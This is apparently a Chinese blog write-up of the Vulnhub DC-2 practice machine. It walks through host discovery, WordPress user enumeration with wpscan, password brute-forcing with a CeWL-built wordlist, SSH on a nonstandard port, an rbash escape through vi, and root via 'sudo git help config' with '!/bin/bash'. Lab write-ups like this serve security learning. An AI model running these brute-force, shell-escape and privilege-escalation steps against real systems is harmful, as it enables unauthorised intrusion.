Vulnhub系列 DC2靶机

闲扯

因为是上周做的，其实中间走了好多弯路，试了好多不成功的，这周再做记录，就像标准答案一样，少了很多自己试错的过程。

搭建

类似dc1：vulnhub系列 DC1 靶机

链接：https://www.vulnhub.com/series/dc,199/（用迅雷下还挺快的）

开始

第一步当然是扫ip，找到目标ip：
arp-scan -l

因为直接用ip是访问不了web的，所以要先配置一下hosts：
vim /etc/hosts

访问http://DC-2，直接看到flag1，提示我们用cewl：

可以看到是WP的站，用wpscan先扫一波，其实没发现啥有用的东西，dirsearch发现的东西都比他的多，上周我的dirsearch还扫出来一些目录遍历来着？
wpscan --url http://dc-2/

用wpscan的扫描功能，找到存在的用户名：
wpscan --url http://dc-2/ -e u


然后用cewl生成密码本，在Root目录下
cewl -w pwd http://dc-2/

然后用已知的条件，去爆破账号密码：
wpscan --url http://dc-2/ -U admin -P /root/pwd (下同）

Jerry和tom的密码已经爆破出来了，登一下试试，发现flag2：

一开始以为提示是让我登另外一个账号，然而不是，我们拿到账号密码后，肯定是要去再试试这个密码是否通用（u1s1，一开始我是试光了msf里面，2018年及以后的exp，才开始想到ssh的）：
尝试连接ssh发现拒绝：(其实ssh命令我也敲错了，我好菜）

Nmap扫描发现7744才是ssh：
nmap -sS -v -A -Pn -p- 192.168.146.131


继续连接，发现只有tom能连上：
ssh [email protected] -p 7744


我们ls一下就能看到flag3，不过有些命令被禁了，很容易尝试出来vi可以用：


我们可以看到上面的特征，rbash，安全模式下的bash，禁用了很多命令，我们先要逃逸出去，下面这个命令是用来看看可以用哪些命令的：
compgen -c

网上很多逃逸方法，试过很多都不行，vi逃逸可以，先输入vi ，进入vi命令行模式，然后输入下面两个命令（是命令行模式，不是插入模式）：

vi
:set shell=/bin/bash
:shell

退出发现变成了bash，可惜还是么的whoami：

然后查看jerry下面有啥，发现了flag4.txt：

提示还有最后一个，那肯定是提权到root了，尝试了DC1的提权，不行，这里用到了git提权：
先切换到jerry账号，因为tom没有sudo命令：（直接su jerry就好）

再提权：
sudo git help config
!/bin/bash

总结

其实过程中，走了超级多超级多的弯路，而且思路上都是自己的，除了技术上看了些答案- -。
过了好几天，记录起来比较简洁化了，而且不知道这是什么鬼截图，这么模糊。
因为公司也比较忙，回来后也没多少时间，很多知识点自己大概理解了就完事了，也没写出来，以后肯定会忘记的= =。